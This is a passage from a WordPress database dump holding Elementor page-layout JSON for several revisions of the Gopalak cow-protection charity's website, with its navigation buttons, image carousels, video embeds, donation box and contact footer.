lType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10697,1781,'_elementor_page_assets','a:0:{}'),(10699,1782,'_elementor_edit_mode','builder'),(10700,1782,'_elementor_template_type','wp-page'),(10701,1782,'_elementor_version','3.7.8'),(10702,1782,'_wp_page_template','elementor_canvas'),(10703,1782,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10704,1782,'_elementor_page_assets','a:0:{}'),(10706,1783,'_elementor_edit_mode','builder'),(10707,1783,'_elementor_template_type','wp-page'),(10708,1783,'_elementor_version','3.7.8'),(10709,1783,'_wp_page_template','elementor_canvas'),(10710,1783,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-